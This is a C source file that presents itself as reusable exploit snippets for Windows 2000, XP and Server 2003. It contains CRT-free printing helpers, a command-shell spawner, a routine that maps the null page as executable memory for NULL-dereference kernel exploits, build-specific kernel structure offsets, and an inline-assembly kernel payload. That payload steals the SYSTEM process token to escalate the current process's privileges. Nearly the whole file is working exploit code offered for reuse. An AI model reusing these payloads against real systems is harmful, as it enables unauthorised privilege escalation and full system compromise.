/*
* C code snippets for reuse in exploits
*/
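/*
 * A version of puts() that doesn't require CRT.
 *
 * Writes `text` (no trailing newline is added) to the process's standard
 * output handle through WriteConsoleA. strlen() itself still comes from the
 * CRT unless the compiler inlines it. The reserved `__`-prefixed name is kept
 * because callers use it.
 *
 * WriteConsoleA only succeeds when STD_OUTPUT_HANDLE is a real console; if
 * stdout is redirected to a file or pipe the call fails and nothing is
 * written. The failure is not reported to the caller.
 */
static void __puts(const char *text)
{
    DWORD charsWritten = 0;

    /* Defensive: a NULL pointer is ignored instead of crashing in strlen(). */
    if (text == NULL) {
        return;
    }
    /* Explicit narrowing: WriteConsoleA takes the length as a DWORD. */
    WriteConsoleA(GetStdHandle(STD_OUTPUT_HANDLE), text, (DWORD)strlen(text),
                  &charsWritten, NULL);
}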
/*
 * vsprintf() function from ntdll.
 *
 * Only the function pointer is declared here; nothing in this file assigns
 * it, so it has to be resolved (per the comment, from ntdll) before
 * __printf() runs, otherwise __printf() calls through a NULL pointer.
 * The variable name is the same as the CRT's vsprintf, which may clash at
 * link time if a CRT is linked in.
 */
typedef int (__cdecl *pvsprintf)(char *buffer, const char *format, va_list argptr);
pvsprintf vsprintf;
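/*
 * A version of printf() that doesn't require CRT.
 *
 * Formats into a fixed 1024-byte stack buffer through the `vsprintf`
 * function pointer (resolved elsewhere) and writes the result to
 * STD_OUTPUT_HANDLE with WriteConsoleA.
 *
 * Returns the value reported by vsprintf: the number of characters
 * formatted, or a negative value on error.
 *
 * NOTE(review): vsprintf performs no bounds checking, so any format that
 * expands to more than sizeof(buffer) bytes overruns the stack. A bounded
 * formatter (ntdll also exports _vsnprintf) would remove that risk; it is
 * not changed here because the pointer type is shared with the typedef
 * above. Callers must keep expansions below 1024 bytes.
 */
static int __printf(const char *fmt, ...)
{
    char buffer[1024];
    DWORD charsWritten = 0;
    va_list args;
    int length;

    va_start(args, fmt);
    length = vsprintf(buffer, fmt, args);
    va_end(args);

    /* Only write when formatting succeeded: a negative length would be
     * converted to a huge DWORD and make WriteConsoleA read past buffer. */
    if (length > 0) {
        WriteConsoleA(GetStdHandle(STD_OUTPUT_HANDLE), buffer, (DWORD)length,
                      &charsWritten, NULL);
    }
    return length;
}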
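/*
 * Simply spawn a CMD shell.
 *
 * Reads the interpreter path from the ComSpec environment variable and
 * starts it in a new console. Returns TRUE if CreateProcessA succeeded,
 * FALSE if ComSpec is unset, too long for the local buffer, or the process
 * could not be created.
 *
 * The child is created with bInheritHandles = TRUE, so every inheritable
 * handle of this process is passed on to it; be aware of that when this
 * process holds handles the child should not receive.
 */
static int SpawnCmd(void)
{
    STARTUPINFOA StartInfo;
    PROCESS_INFORMATION ProcInfo;
    char ComSpec[128];
    DWORD Len;
    BOOL Success;

    /* GetEnvironmentVariableA returns 0 on failure and the required size
     * (including the terminator) when the buffer is too small; in the
     * latter case the buffer contents must not be used. */
    Len = GetEnvironmentVariableA("ComSpec", ComSpec, sizeof(ComSpec));
    if (Len == 0 || Len >= sizeof(ComSpec)) {
        return FALSE;
    }

    memset(&StartInfo, 0, sizeof(StartInfo));
    StartInfo.cb = sizeof(StartInfo);
    memset(&ProcInfo, 0, sizeof(ProcInfo));

    Success = CreateProcessA(
        NULL,               /* lpApplicationName: taken from the command line */
        ComSpec,            /* lpCommandLine: must be writable, which a local array is */
        NULL,               /* lpProcessAttributes */
        NULL,               /* lpThreadAttributes */
        TRUE,               /* bInheritHandles */
        CREATE_NEW_CONSOLE,
        NULL,               /* lpEnvironment: inherit ours */
        NULL,               /* lpCurrentDirectory: inherit ours */
        &StartInfo,
        &ProcInfo);

    /* The caller never receives the process/thread handles; close them so
     * they don't stay open for the lifetime of this process. */
    if (Success) {
        CloseHandle(ProcInfo.hThread);
        CloseHandle(ProcInfo.hProcess);
    }
    return Success;
}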
/*
 * Allocate page zero.
 *
 * Asks NtAllocateVirtualMemory to reserve and commit `Size` bytes of
 * read/write/execute memory in the current process (pseudo-handle -1),
 * starting from the page that contains address 1 - that is, the null page.
 * Address 0 cannot be requested directly because a NULL base address means
 * "let the kernel choose". The size is passed by pointer and rounded up to
 * page granularity by the call. The system call's NTSTATUS is returned
 * unchanged.
 *
 * Newer Windows versions refuse to map the null page by default, so expect
 * a failure status there.
 */
static NTSTATUS MapPageZero(SIZE_T Size)
{
    HANDLE CurrentProcess = (HANDLE)-1;
    PVOID BaseAddress = (PVOID)1;
    SIZE_T RegionSize = Size;
    ULONG AllocationType = MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN;
    ULONG Protect = PAGE_EXECUTE_READWRITE;

    return NtAllocateVirtualMemory(CurrentProcess, &BaseAddress, 0,
                                   &RegionSize, AllocationType, Protect);
}
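/*
 * Pack an NT major/minor version and service-pack number into one integer so
 * the offset table below can be selected with a single comparison. Every
 * argument is parenthesised so that expressions can be passed safely.
 */
#define NTVER(maj, min, csd) (((maj) << 24) | ((min) << 16) | ((csd) << 8))
/*
 * Target build. Exactly one NTOS_TARGET_VER line must be active: the
 * structure offsets below are specific to that build and are wrong for any
 * other, which is why an unknown value is a hard #error rather than a
 * fallback.
 */
// Windows 2000 SP4 UR1
#define NTOS_TARGET_VER NTVER(5,0,4)
// Windows XP SP3
//#define NTOS_TARGET_VER NTVER(5,1,3)
// Windows Server 2003 R2 SP2
//#define NTOS_TARGET_VER NTVER(5,2,2)
#if (NTOS_TARGET_VER == NTVER(5,0,4))
#define SYSTEM_PID 8
#define OFFSET_KPCR_KTHREAD 0x124
#define OFFSET_KTHREAD_KPROCESS 0x44
#define OFFSET_EPROCESS_UNIQUEPID 0x9C
#define OFFSET_EPROCESS_APLINKS 0xA0
#define OFFSET_EPROCESS_TOKEN 0x12C
#elif (NTOS_TARGET_VER == NTVER(5,1,3))
#define SYSTEM_PID 4
#define OFFSET_KPCR_KTHREAD 0x124
#define OFFSET_KTHREAD_KPROCESS 0x44
#define OFFSET_EPROCESS_UNIQUEPID 0x84
#define OFFSET_EPROCESS_APLINKS 0x88
#define OFFSET_EPROCESS_TOKEN 0xC8
#elif (NTOS_TARGET_VER == NTVER(5,2,2))
#define SYSTEM_PID 4
#define OFFSET_KPCR_KTHREAD 0x124
#define OFFSET_KTHREAD_KPROCESS 0x128
#define OFFSET_EPROCESS_UNIQUEPID 0x94
#define OFFSET_EPROCESS_APLINKS 0x98
#define OFFSET_EPROCESS_TOKEN 0xD8
#else
#error Please define NTOS_TARGET_VER.
#endif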
/*
 * Token stealer payload (x86-32, MSVC inline assembly only).
 *
 * Intended to run in kernel context, since it dereferences kernel structures
 * directly. Using the OFFSET_* constants selected by NTOS_TARGET_VER above,
 * it:
 *   1. reads the current KTHREAD from the KPCR at fs:[OFFSET_KPCR_KTHREAD]
 *      and from it the current KPROCESS pointer, which the code treats as
 *      the EPROCESS base and saves on the stack;
 *   2. follows ActiveProcessLinks (OFFSET_EPROCESS_APLINKS) from one
 *      EPROCESS to the next until it reaches the one whose UniqueProcessId
 *      equals SYSTEM_PID;
 *   3. copies that process's Token field over the saved current process's
 *      Token field. Only the pointer is written; nothing else in either
 *      structure is touched.
 *
 * Clobbers eax and edx. All offsets are build-specific, so this only works
 * against the build the table above was selected for.
 */
static void TokenStealer(void)
{
    __asm {
        // current KTHREAD from the KPCR, then its KPROCESS (used as EPROCESS)
        mov eax, fs:[OFFSET_KPCR_KTHREAD]
        mov eax, [eax + OFFSET_KTHREAD_KPROCESS]
        push eax                                 // save current EPROCESS
aplinks_loop:
        // follow ActiveProcessLinks.Flink, then recover the containing EPROCESS
        mov eax, [eax + OFFSET_EPROCESS_APLINKS]
        lea eax, [eax - OFFSET_EPROCESS_APLINKS]
        cmp dword ptr [eax + OFFSET_EPROCESS_UNIQUEPID], SYSTEM_PID
        jne aplinks_loop
        mov eax, [eax + OFFSET_EPROCESS_TOKEN]   // Token of the SYSTEM_PID process
        pop edx                                  // saved current EPROCESS
        mov [edx + OFFSET_EPROCESS_TOKEN], eax   // overwrite its Token pointer
    }
}